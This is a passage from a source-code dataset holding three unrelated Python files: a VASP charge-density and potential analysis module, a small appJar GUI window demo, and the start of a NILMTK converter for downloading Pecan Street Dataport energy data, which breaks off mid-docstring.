#\n# #\n###############################################################################\n\nfrom __future__ import print_function, division\nfrom functools import reduce\nimport math\nfrom itertools import chain\n\nimport numpy\nimport numpy as np\nfrom scipy import interpolate\n\n#------------------------------------------------------------------------------\ndef gradient_magnitude(gx, gy, gz):\n \"\"\"Converts the separate gradient magnitudes to a single magnitude\n Args:\n gx/y/z : fields in x y and z directions 2D array\n Returns:\n grad_mag : gradient of fields at each point\"\"\"\n\n grad_mag = gx\n for i in range(gx.shape[0]):\n for j in range(gy.shape[1]):\n for k in range(gz.shape[2]):\n grad_mag[i,j,k] = np.sqrt(gx[i,j,k]**2 +\n gy[i,j,k]**2 +\n gz[i,j,k]**2)\n\n return grad_mag\n#------------------------------------------------------------------------------\n\ndef vector_2_abscissa(vector, magnitude, dx, dy, dz):\n \"\"\"Converts a vector with a magnitude given in units of grid density\n (NGX/Y/Z) to AA for plotting\n Args:\n vector : the vector along which the line is being plotted [(3x1) array]\n magnitude : the number of steps that were taken along that vector\n [Integer]\n dx/y/z: the resolution of the density grid in AA-1 [Real]\n Returns:\n abscissa : the values for plotting on the abscissa in AA [1D array]\n \"\"\"\n vec_mag = np.linalg.norm([vector[0] * dx, vector[1] * dy, vector[2] * dz])\n abscissa = [i * vec_mag for i in range(magnitude)]\n\n return np.asarray(abscissa)\n#------------------------------------------------------------------------------\n\ndef number_in_field(gradients, cutoff):\n \"\"\"Get number of grid elements with a field magnitude greater than cutoff\n Args:\n gradients: the grid of field gradients (Real(ngx,ngy,ngz))\n cutoff: the value above which tocout them (Real)\n Returns:\n number_of_elements: the number satisfying the condition (Integer)\n \"\"\"\n number_of_elements = 0\n for element in np.nditer(gradients):\n if element >= cutoff:\n number_of_elements += 1\n\n return number_of_elements\n#------------------------------------------------------------------------------\n\ndef element_vol(vol, nx, ny, nz):\n \"\"\"Calculates the volume of each of the elements on the grid.\n Args:\n vol: the cell volume (real)\n x : the number of grid points in each direction (real)\n Returns:\n ele_vol : the volume (real)\n \"\"\"\n number_of_elements = nx * ny * nz\n ele_vol = vol / number_of_elements\n\n return ele_vol\n\n#------------------------------------------------------------------------------\n\ndef one_2_2d(Array, resolution, vector):\n \"\"\"Converts the 1d potential array to 2D with angstroms in A[0]\n Args:\n Array: 1D array\n resolution: density of sampling of distance (1/AA)\n vector: The vector of the direction of sampling\n Returns\n New_array: 2D array\n \"\"\"\n length = np.sqrt(vector.dot(vector))\n New_array = np.zeros(shape=(len(Array) - 1, 2))\n resolution = length / len(Array)\n for i in range(len(Array) - 1):\n New_array[i,0] = i*resolution\n New_array[i,1] = Array[i]\n\n return New_array\n#------------------------------------------------------------------------------\n\ndef macroscopic_average(potential, periodicity, resolution):\n \"\"\"Getting the macroscopic average of potential\n Args:\n potential : array containig the electrostaticpotential/charge density\n periodicity : real number; the period over which to average\n resolution : the grid resolution in the direction of averaging\n Returns:\n macro_average : array with the 
macroscopically averaged values\"\"\"\n\n\n macro_average = np.zeros(shape=(len(potential)))\n period_points = int((periodicity/resolution))\n # Period points must be even\n if period_points % 2 != 0:\n period_points = period_points + 1\n\n length = len(potential)\n for i in range(length):\n start = i - int(period_points / 2)\n end = i + int(period_points / 2)\n if start < 0:\n start = start + length\n macro_average[i] = macro_average[i] + sum(potential[0:end]) + sum(potential[start:length])\n macro_average[i] = macro_average[i] / period_points\n elif end >= length:\n end = end - length\n macro_average[i] = macro_average[i] + sum(potential[start:length]) + sum(potential[0:end])\n macro_average[i] = macro_average[i] / period_points\n else:\n macro_average[i] = macro_average[i] + sum(potential[start:end]) / period_points\n\n print(\"Average of the average = \", numpy.average(macro_average))\n\n return macro_average\n#------------------------------------------------------------------------------\n\ndef cube_potential(origin, travelled, cube, Grid, nx, ny, nz):\n \"\"\"Populates the sampling cube with the potential required\"\"\"\n\n # Recalc the origin as grid point coordinates\n n_origin = np.zeros(shape=(3))\n n_origin[0] = int(origin[0]*nx)\n n_origin[1] = int(origin[1]*ny)\n n_origin[2] = int(origin[2]*nz)\n potential_cube = np.zeros(shape=(cube[0],cube[1],cube[2]))\n for x in range(0,cube[0]):\n for y in range(0,cube[1]):\n for z in range(0,cube[2]):\n # Assign the values of coordinates in the original grid\n xv = int(n_origin[0]+travelled[0]+x)\n yv = int(n_origin[1]+travelled[1]+y)\n zv = int(n_origin[2]+travelled[2]+z)\n # Minimum image convention\n zv = int(zv - nz*round(zv/nz))\n yv = int(yv - ny*round(yv/ny))\n xv = int(xv - nx*round(xv/nx))\n potential_cube[x,y,z] = Grid[int(xv),int(yv),int(zv)]\n\n return potential_cube.mean(), np.var(potential_cube)\n#------------------------------------------------------------------------------\n\ndef cuboid_average(Grid, cube, origin, vector, nx, ny, nz, magnitude):\n \"\"\"Calculates the average in a cube defined by size cube(a,b,c), beginning\n at origin and travelling as far as magnitude.\"\"\"\n\n plotting_average = np.zeros(shape=(magnitude))\n i = 0\n while i < magnitude:\n travelled = np.multiply(i, vector)\n plotting_average[i], varience = cube_potential(origin, travelled,\n cube, Grid,\n nx, ny, nz)\n i = i + 1\n\n return plotting_average\n#------------------------------------------------------------------------------\n\ndef planar_average(Grid, nx, ny, nz, axis='z'):\n \"\"\"Calculate the average in a given plane for the full length of the\n normal; e.g. 
the full length of z in the xy plane.\"\"\"\n if axis == 'x':\n x_plane = np.zeros(shape=(ny, nz))\n Average = np.zeros(shape=(nx))\n for x_value in range(nx):\n x_plane[:,:] = Grid[x_value,:,:]\n Average[x_value] = x_plane.mean()\n if axis == 'y':\n Average = np.zeros(shape=(ny))\n y_plane = np.zeros(shape=(nx,nz))\n for y_value in range(ny):\n y_plane[:,:] = Grid[:,y_value,:]\n Average[y_value] = y_plane.mean()\n if axis == 'z':\n Average = np.zeros(shape=(nz))\n z_plane = np.zeros(shape=(nx,ny))\n for z_value in range(nz):\n z_plane[:,:] = Grid[:,:,z_value]\n Average[z_value] = z_plane.mean()\n\n return Average\n#------------------------------------------------------------------------------\n\ndef get_volume(a,b,c):\n \"\"\"Calculate the volume of the cell from lattice vectors\n Args:\n a/b/c: vectors of the lattice edges\n \"\"\"\n volume = np.dot(a,np.cross(b,c))\n\n return volume\n#------------------------------------------------------------------------------\n\ndef numbers_2_grid(a,NGX,NGY,NGZ):\n \"\"\"Takes a point (in fractional coordinates) and converts it to a VASP grid\n point based on the NGX/Y/Z values.\"\"\"\n a_grid = np.zeros(shape=(3))\n a_grid[0] = round(float(a[0])*NGX)\n a_grid[1] = round(float(a[1])*NGY)\n a_grid[2] = round(float(a[2])*NGZ)\n\n return a_grid\n#------------------------------------------------------------------------------\n\ndef matrix_2_abc(Lattice):\n \"\"\"The the VASP lattice and convert to the a,b,c,alpha,beta,gamma format\"\"\"\n\n a = np.sqrt(Lattice[0,0]**2+Lattice[0,1]**2+Lattice[0,2]**2)\n b = np.sqrt(Lattice[1,0]**2+Lattice[1,1]**2+Lattice[1,2]**2)\n c = np.sqrt(Lattice[2,0]**2+Lattice[2,1]**2+Lattice[2,2]**2)\n\n a_vec = Lattice[0,:]\n b_vec = Lattice[1,:]\n c_vec = Lattice[2,:]\n\n return a,b,c,a_vec,b_vec,c_vec\n#------------------------------------------------------------------------------\n\ndef _print_boom(quiet=False):\n if not quiet:\n print(\"\\n\")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"BBBB OOOO OOOO MMMMM \")\n print(\"B B OOOO OOOO MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"B B O O O O MMMMM \")\n print(\"BBBB O O O O M M M \")\n print(\"BBBB O O O O M M M \")\n print(\"BBBB O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B O O O O M M M \")\n print(\"B B OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n print(\"BBBB OOOO OOOO M M M \")\n\ndef read_vasp_density(FILE, use_pandas=None, quiet=False):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\n\n Args:\n FILE (str): Path to density file\n use_pandas (bool): Use Pandas library for faster file reading. 
If set\n to None, Pandas will be used when available.\n\n Returns:\n Potential (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where Potential is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n\n \"\"\"\n # Get Header information by reading a line at a time\n\n if use_pandas:\n from pandas import read_table as pandas_read_table\n elif use_pandas is None:\n try:\n from pandas import read_table as pandas_read_table\n use_pandas = True\n except ImportError:\n use_pandas = False\n\n print(\"Reading header information...\")\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n\n if use_pandas:\n print(\"Reading 3D data using Pandas...\")\n skiprows = 10 + num_atoms\n readrows = int(math.ceil(NGX * NGY * NGZ / 5))\n\n dat = pandas_read_table(FILE, delim_whitespace=True,\n skiprows=skiprows, header=None,\n nrows=readrows)\n Potential = dat.iloc[:readrows, :5].values.flatten()\n remainder = (NGX * NGY * NGZ) % 5\n if remainder > 0:\n Potential = Potential[:(-5 + remainder)]\n\n else:\n print(\"Reading 3D data...\")\n Potential = (f.readline().split()\n for i in range(int(math.ceil(NGX * NGY * NGZ / 5))))\n Potential = numpy.fromiter(chain.from_iterable(Potential), float)\n\n _print_boom(quiet=quiet)\n if not quiet:\n print(\"Average of the potential = \", numpy.average(Potential))\n\n return Potential, NGX, NGY, NGZ, lattice\n#------------------------------------------------------------------------------\n\ndef _read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ, spin=0):\n '''\n use_pandas (bool): Use Pandas library for faster file reading. 
If set \n to None, Pandas will be used when available.\n spin: the set of spin data to read, default 0 for ISPIN=1 calculation\n '''\n print(\"PANDAS:\", use_pandas)\n if use_pandas:\n from pandas import read_table as pandas_read_table\n elif use_pandas is None:\n try:\n from pandas import read_table as pandas_read_table\n use_pandas = True\n except ImportError:\n use_pandas = False\n\n\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n\n if use_pandas:\n print(\"Reading 3D data using Pandas...\")\n skiprows = 10 + num_atoms + spin * \\\n (math.ceil(NGX * NGY * NGZ / 10) + 2)\n readrows = int(math.ceil(NGX * NGY * NGZ / 10))\n\n dat = pandas_read_table(FILE, delim_whitespace=True,\n skiprows=skiprows, header=None,\n nrows=readrows)\n density = dat.iloc[:readrows, :10].values.flatten()\n remainder = (NGX * NGY * NGZ) % 10\n if remainder > 0:\n density = density[:(-10 + remainder)]\n else:\n print(\"Reading 3D data...\")\n density = (f.readline().split()\n for i in range(int(math.ceil(NGX * NGY * NGZ / 10))))\n density = numpy.fromiter(chain.from_iterable(density), float)\n\n return density\n\n#------------------------------------------------------------------------------\ndef read_vasp_parchg(FILE, use_pandas=None, quiet=False, spin=False):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\n\n Args:\n FILE (str): Path to parchg file\n use_pandas (bool): Use Pandas library for faster file reading. If set\n to None, Pandas will be used when available.\n spin(bool): is the data spin polarised? 
\n\n Returns:\n density (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where density is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n\n \"\"\"\n # Get Header information by reading a line at a time\n\n print(\"Reading header information...\")\n with open(FILE, \"r\") as f:\n _ = f.readline()\n scale_factor = float(f.readline())\n\n lattice = np.zeros(shape=(3,3))\n for row in range(3):\n lattice[row] = [float(x) for x in f.readline().split()]\n lattice = lattice * scale_factor\n\n num_species = len(f.readline().split())\n num_type = [int(x) for x in f.readline().split()]\n num_atoms = sum(num_type)\n coord_type = f.readline().strip()\n\n coordinates = numpy.zeros(shape=(num_atoms, 3))\n for atom_i in range(num_atoms):\n coordinates[atom_i] = [float(x) for x in f.readline().split()]\n\n # Skip blank line\n _ = f.readline()\n\n NGX, NGY, NGZ = [int(x) for x in f.readline().split()]\n \n if not spin:\n density = _read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ)\n else:\n densities = []\n densities.append(_read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ\n , spin=0))\n densities.append(_read_partial_density(FILE, use_pandas, num_atoms, NGX, NGY, NGZ\n , spin=1))\n alpha = densities[0] + densities[1]\n beta = densities[0] - densities[1]\n density = [alpha, beta]\n _print_boom(quiet=quiet)\n\n return density, NGX, NGY, NGZ, lattice\n\ndef read_vasp_density_classic(FILE):\n \"\"\"Reimplementation of the legacy 3D data importer\n\n This is still quite a bit slower than the new ``read_vasp_density`` but it\n makes less assumptions about where newlines will appear in the file. It\n also prints the progress reading through the file; this definitely makes it\n slower but might _feel_ faster!\n \"\"\"\n with open(FILE, \"r\") as f:\n lines = f.readlines()\n return _read_vasp_density_fromlines(lines)\n\ndef _read_vasp_density_fromlines(lines):\n \"\"\"Generic reading of CHGCAR LOCPOT etc files from VASP\"\"\"\n\n i, j, k = 0, 0, 0\n NGX, NGY, NGZ = 0, 0, 0\n\n lattice = np.zeros(shape=(3,3))\n upper_limit, num_species, scale_factor = 0, 0, 0\n num_atoms = 1 # First test needs to fail until headers have been read\n Potential, Coordinates = np.zeros(1), np.zeros(1)\n\n for line in lines:\n inp = line.split()\n\n if inp == []:\n continue\n else:\n i += 1\n if i > (num_atoms + 9) and i < (num_atoms + 10 + upper_limit):\n for m, val in enumerate(inp):\n Potential[k + m] = val\n k = k + 5\n if math.fmod(k, 100000) == 0:\n print(\"Reading potential at point\", k)\n elif i == 2:\n scale_factor = float(inp[0])\n elif i >= 3 and i < 6:\n lattice[i-3,:]=inp[:]\n elif i == 6:\n num_species = len(inp)\n species = inp\n elif i == 7:\n num_type = inp\n num_atoms = sum(int(x) for x in num_type)\n elif i == 8:\n coord_type = inp\n Coordinates = numpy.zeros(shape=(num_atoms,3))\n elif i >= 9 and i <= num_atoms + 8:\n Coordinates[i-9,0] = float(inp[0])\n Coordinates[i-9,1] = float(inp[1])\n Coordinates[i-9,2] = float(inp[2])\n elif i == num_atoms + 9:\n NGX = int(inp[0])\n NGY = int(inp[1])\n NGZ = int(inp[2])\n Potential = numpy.zeros(shape=(NGX * NGY * NGZ))\n # Read in the potential data\n upper_limit = (int(NGX * NGY * NGZ / 5) +\n np.mod(NGX * NGY * NGZ, 5))\n\n _print_boom()\n print(\"Average of the potential = \", numpy.average(Potential))\n\n lattice = lattice * scale_factor\n\n return Potential, NGX, NGY, NGZ, 
lattice\n#------------------------------------------------------------------------------\n\ndef density_2_grid(Density, nx, ny, nz, Charge=False, Volume=1):\n \"\"\"Convert the Potential list to a grid for ease of manipulation\n Args:\n Density: Array of the output from a VAsp calulation charge/potential\n nx,y,z : Number of mesh points in x/y/z\n Charge : Boolean, is it charge or potential (charge needs to be\n normalised by vol)\n Volume : The lattice vectors, only required for normalising charge.\n Returns:\n Potential_grid: the (normalised) quantity on a mesh\n total_electrons : the number of electrons in the system\n \"\"\"\n l = 0\n Potential_grid = np.zeros(shape=(nx,ny,nz))\n total_electrons = 0\n is_CHGCAR = True\n for k in range(nz):\n for j in range(ny):\n for i in range(nx):\n Potential_grid[i,j,k] = Density[l] / Volume\n if Charge == True:\n # Convert the charge density to a number of electrons\n point_volume = Volume / (nx*ny*nz)\n Potential_grid[i,j,k] = Potential_grid[i,j,k]*point_volume\n total_electrons = total_electrons + Density[l]\n l = l + 1\n if Charge == True:\n print(\"Total electrons: \", total_electrons / (nx * ny * nz))\n total_electrons = total_electrons / (nx * ny * nz)\n return Potential_grid, total_electrons\n#------------------------------------------------------------------------------\n\ndef density_2_grid_gulp(Density, nx, ny, nz):\n \"\"\"Convert the Potential list to a grid for ease of manipulation\n Args:\n Density: Array of the output from a VAsp calulation charge/potential\n nx,y,z : Number of mesh points in x/y/z\n Returns:\n Potential_grid: the (normalised) quantity on a mesh\n \"\"\"\n l = 0\n Potential_grid = np.zeros(shape=(nx,ny,nz))\n total_electrons = 0\n is_CHGCAR = True\n for k in range(nx):\n for j in range(ny):\n for i in range(nz):\n Potential_grid[k,j,i] = Density[l]\n l = l + 1\n return Potential_grid\n\n#------------------------------------------------------------------------------\ndef read_gulp_potential(gulpfile='gulp.out'):\n\n \"\"\"Generic reading of GULP output\n\n Args:\n gulpfile (str): Path to gulp output file\n\n Returns:\n potential (array), NGX (int), NGY (int), NGZ (int), lattice (array)\n\n where density is a 1-D flattened array of density data with original\n dimensions NGX x NGY x NGZ and lattice is the 3x3 unit-cell matrix.\n \"\"\"\n\n potential = []\n\n try:\n file_handle=open(gulpfile)\n except IOError:\n print(\"File not found or path is incorrect\")\n \n lines = file_handle.readlines()\n for n, line in enumerate(lines):\n if line.rfind('Cartesian lattice vectors') > -1:\n lattice = np.zeros(shape=(3, 3))\n for r in range(3):\n lattice[r] = lines[n + 2 + r].split()\n break\n\n for n, line in enumerate(lines):\n if line.rfind('Electrostatic potential on a grid') > -1:\n NGX = int(lines[n + 3].split()[3])\n NGY = int(lines[n + 3].split()[5])\n NGZ = int(lines[n + 3].split()[7])\n break\n\n for n, line in enumerate(lines):\n if line.rfind('Electrostatic potential on a grid') > -1:\n for k in reversed(range(9, NGX*NGY*NGZ + 9)):\n potential.append(float(lines[n + k].split()[3]))\n\n\n return np.asarray(potential), NGX, NGY, NGZ, lattice\n\n\n#------------------------------------------------------------------------------\n\ndef GCD(a,b):\n \"\"\" The Euclidean Algorithm \"\"\"\n a = abs(a)\n b = abs(b)\n while a:\n a, b = (b % a), a\n return b\n#------------------------------------------------------------------------------\n\ndef GCD_List(list):\n \"\"\" Finds the GCD of numbers in a list.\n Input: List of numbers 
you want to find the GCD of\n E.g. [8, 24, 12]\n Returns: GCD of all numbers\n \"\"\"\n return reduce(GCD, list)\n#------------------------------------------------------------------------------\ndef inverse_participation_ratio(density):\n \"\"\" Calculate the IPR, which is Psi**4 or Rho**2\n Input: density, a 1-D flattened grid of the electron density for the state\n this is calculated from the PARCHG in VASP\n Output: ipr, float\n \"\"\"\n\n sq = sum(i**2 for i in density)\n fr = sum(i**4 for i in density)\n ifr = 1 / (len(density) * fr)\n isq = 1 / (len(density) * sq)\n return fr / sq**2\n\n"} {"ext": "py", "sha": "1a30c42733997c4dd61bb8f8ece8382751675f09", "content": "import sys\nsys.path.append(\"../../\")\n\ndef press(btn):\n if btn == \"SUB\":\n app.showSubWindow(\"Sub\")\n app.hide()\n if btn in [\"POPUP2\", \"POPUP\"]:\n app.infoBox(\"INFO\", \"INFO\")\n if btn == \"MAIN\":\n app.show()\n app.hideSubWindow(\"Sub\")\n\ndef closer(btn=None):\n print(\"aaa\")\n\nfrom appJar import gui\n\nwith gui(\"Main Window\", startWindow=\"Sub\") as app:\n#with gui(\"Main Window\") as app:\n app.label(\"title\", \"Main Window\")\n app.button(\"POPUP\", press)\n\n with app.subWindow(\"Sub\"):\n app.label(\"sub\", \"SubWindow\")\n app.button(\"POPUP2\", press)\n app.button(\"MAIN\", press)\n app.setStopFunction(closer)\n\n# app.hide()\n# app.showSubWindow(\"Sub\")\n"} {"ext": "py", "sha": "1a30c46c94fb35b6bee3ab3b31e060ffca5f66d9", "content": "from __future__ import print_function, division\nimport os\nimport re\nimport datetime\nimport sys\nfrom os.path import join, isdir, isfile, dirname, abspath\nimport pandas as pd\nimport yaml\nimport psycopg2 as db\nfrom nilmtk.measurement import measurement_columns\nfrom nilmtk.measurement import LEVEL_NAMES\nfrom nilmtk.datastore import Key\nfrom nilm_metadata import convert_yaml_to_hdf5\nfrom nilmtk.utils import get_module_directory\nimport shutil\nimport tempfile\n\n\"\"\"\nMANUAL:\n\ndataport is a large dataset hosted in a remote SQL database. This\nfile provides a function to download the dataset and save it to disk\nas NILMTK-DF. 
Since downloading the entire dataset will likely take >\n24 hours, this function provides some options to allow you to download\nonly a subset of the data.\n\n'''''''''''''''' Previous Version '''''''''''''''''''''\nFor example, to only load house 26 for April 2014:\n from nilmtk.dataset_converters.dataport.download_dataport\n import download_dataport\n download_dataport(\n 'username',\n 'password',\n '/path/output_filename.h5',\n periods_to_load={26: ('2014-04-01', '2014-05-01')}\n )\n'''''''''''''''' Previous Version '''''''''''''''''''''\n\n'''''''''''''''' New Version '''''''''''''''''''''\n\n from nilmtk.dataset_converters.dataport.download_dataport\n import download_dataport,\n _dataport_dataframe_to_hdf,\n view_database_tables,\n view_buildings,\n view_data_window\n\n # see all available tables in the dataport database.\n view_database_tables(\n 'username',\n 'password',\n 'database_schema' # university or commercial\n )\n\n # show the list of all available buildings\n view_buildings(\n 'username',\n 'password',\n 'database_schema', # university or commercial\n 'table_name' # for example 'electricity_egauge_15min', 'electricity_egauge_hours'\n )\n\n # view data collection window of selected buildings\n view_data_window(\n 'username',\n 'password',\n 'database_schema', # university or commercial\n 'table_name', # for example 'electricity_egauge_15min','electricity_egauge_hours'\n [18,26,43,44] # data collection window of building 18,26,43 and 44 respectively\n )\n\n # download the dataset.\n For example, loading electricity_egauge_hours from 2018-11-17 to\n 2019-12-17 of building 26\n download_dataport(\n 'username',\n 'password',\n '/path/output_filename.h5',\n 'university',\n 'electricity_egauge_hours',\n periods_to_load={ 26: ('2018-11-17', '2019-12-17')})\n\n\n'''''''''''''''' New Version '''''''''''''''''''''\n\nREQUIREMENTS:\n\nOn Ubuntu:\n* sudo apt-get install libpq-dev\n* sudo pip install psycopg2\n\nTODO:\n* intelligently handle queries that fail due to network\n* integrate 'grid' (use - gen) and 'gen'\n\n\"\"\"\nfeed_mapping = {\n 'use': {},\n 'air1': {'type': 'air conditioner'},\n 'air2': {'type': 'air conditioner'},\n 'air3': {'type': 'air conditioner'},\n 'airwindowunit1': {'type': 'air conditioner'},\n 'aquarium1': {'type': 'appliance'},\n 'bathroom1': {'type': 'sockets', 'room': 'bathroom'},\n 'bathroom2': {'type': 'sockets', 'room': 'bathroom'},\n 'bedroom1': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom2': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom3': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom4': {'type': 'sockets', 'room': 'bedroom'},\n 'bedroom5': {'type': 'sockets', 'room': 'bedroom'},\n 'car1': {'type': 'electric vehicle'},\n 'clotheswasher1': {'type': 'washing machine'},\n 'clotheswasher_dryg1': {'type': 'washer dryer'},\n 'diningroom1': {'type': 'sockets', 'room': 'dining room'},\n 'diningroom2': {'type': 'sockets', 'room': 'dining room'},\n 'dishwasher1': {'type': 'dish washer'},\n 'disposal1': {'type': 'waste disposal unit'},\n 'drye1': {'type': 'spin dryer'},\n 'dryg1': {'type': 'spin dryer'},\n 'freezer1': {'type': 'freezer'},\n 'furnace1': {'type': 'electric furnace'},\n 'furnace2': {'type': 'electric furnace'},\n 'garage1': {'type': 'sockets', 'room': 'dining room'},\n 'garage2': {'type': 'sockets', 'room': 'dining room'},\n 'gen': {},\n 'grid': {},\n 'heater1': {'type': 'electric space heater'},\n 'housefan1': {'type': 'electric space heater'},\n 'icemaker1': {'type': 'appliance'},\n 'jacuzzi1': {'type': 'electric hot tub 
heater'},\n 'kitchen1': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchen2': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchenapp1': {'type': 'sockets', 'room': 'kitchen'},\n 'kitchenapp2': {'type': 'sockets', 'room': 'kitchen'},\n 'lights_plugs1': {'type': 'light'},\n 'lights_plugs2': {'type': 'light'},\n 'lights_plugs3': {'type': 'light'},\n 'lights_plugs4': {'type': 'light'},\n 'lights_plugs5': {'type': 'light'},\n 'lights_plugs6': {'type': 'light'},\n 'livingroom1': {'type': 'sockets', 'room': 'living room'},\n 'livingroom2': {'type': 'sockets', 'room': 'living room'},\n 'microwave1': {'type': 'microwave'},\n 'office1': {'type': 'sockets', 'room': 'office'},\n 'outsidelights_plugs1': {'type': 'sockets', 'room': 'outside'},\n 'outsidelights_plugs2': {'type': 'sockets', 'room': 'outside'},\n 'oven1': {'type': 'oven'},\n 'oven2': {'type': 'oven'},\n 'pool1': {'type': 'electric swimming pool heater'},\n 'pool2': {'type': 'electric swimming pool heater'},\n 'poollight1': {'type': 'light'},\n 'poolpump1': {'type': 'electric swimming pool heater'},\n 'pump1': {'type': 'appliance'},\n 'range1': {'type': 'stove'},\n 'refrigerator1': {'type': 'fridge'},\n 'refrigerator2': {'type': 'fridge'},\n 'security1': {'type': 'security alarm'},\n 'shed1': {'type': 'sockets', 'room': 'shed'},\n 'sprinkler1': {'type': 'appliance'},\n 'unknown1': {'type': 'unknown'},\n 'unknown2': {'type': 'unknown'},\n 'unknown3': {'type': 'unknown'},\n 'unknown4': {'type': 'unknown'},\n 'utilityroom1': {'type': 'sockets', 'room': 'utility room'},\n 'venthood1': {'type': 'appliance'},\n 'waterheater1': {'type': 'electric water heating appliance'},\n 'waterheater2': {'type': 'electric water heating appliance'},\n 'winecooler1': {'type': 'appliance'},\n }\n\nfeed_ignore = ['gen', 'grid']\n\n\ndef database_assert(database_table):\n assert (\n database_table == 'electricity_egauge_15min' or\n database_table == 'electricity_egauge_hours' or\n database_table == 'electricity_egauge_minutes' or\n database_table == 'electricity_egauge_seconds'\n ), \"Table not compatible with NILMTK\"\n\n\ndef view_database_tables(\n database_username,\n database_password,\n database_schema\n):\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # Loading university schemas\n sql_query = (\"SELECT table_name\" +\n \" FROM information_schema.views\" +\n \" WHERE table_schema ='\" + database_schema + \"'\" +\n \" ORDER BY table_name\")\n database_tables = pd.read_sql(sql_query, conn)['table_name'].tolist()\n\n df = pd.DataFrame({database_schema: database_tables})\n print(df)\n conn.close()\n\n\ndef view_buildings(\n database_username,\n database_password,\n database_schema,\n database_table\n):\n\n database_assert(database_table)\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # select all buildings for the database_table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE' + database_table +\n 
' ORDER BY dataid')\n\n buildings_in_table = pd.read_sql(sql_query, conn)['dataid'].tolist()\n print(buildings_in_table)\n conn.close()\n\n\ndef view_data_window(\n database_username,\n database_password,\n database_schema,\n database_table,\n building_no=None):\n\n database_assert(database_table)\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # select all buildings for the database_table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE' + database_table +\n ' ORDER BY dataid')\n\n if(not (building_no)):\n print(\" Please provide the list of building numbers \")\n else:\n for each_building in building_no:\n sql_query = ('SELECT MIN(egauge_min_time) AS minlocalminute,' +\n ' MAX(egauge_max_time) AS maxlocalminute' +\n ' FROM university.metadata' +\n ' WHERE dataid=' + str(each_building))\n\n timestamps = pd.read_sql(sql_query, conn)\n first_timestamp_in_table = timestamps['minlocalminute'][0]\n last_timestamp_in_table = timestamps['maxlocalminute'][0]\n print(str(each_building),\n \"\\t\\t\", first_timestamp_in_table,\n \"\\t\\t\", last_timestamp_in_table)\n print(\"Done loading all the buildings!!\")\n\n conn.close()\n\n\ndef download_dataport(database_username,\n database_password, hdf_filename,\n database_schema='university',\n user_selected_table='electricity_egauge_minutes',\n periods_to_load=None):\n \"\"\"\n Downloads data from dataport database into an HDF5 file.\n\n Parameters\n ----------\n hdf_filename : str\n Output HDF filename. If file exists already then will be deleted.\n database_username, database_password, database_schema,user_selected_table, hdf_filename : str\n periods_to_load : dict of tuples, optional\n Key of dict is the building number (int).\n Values are (<start date>, <end date>)\n e.g. 
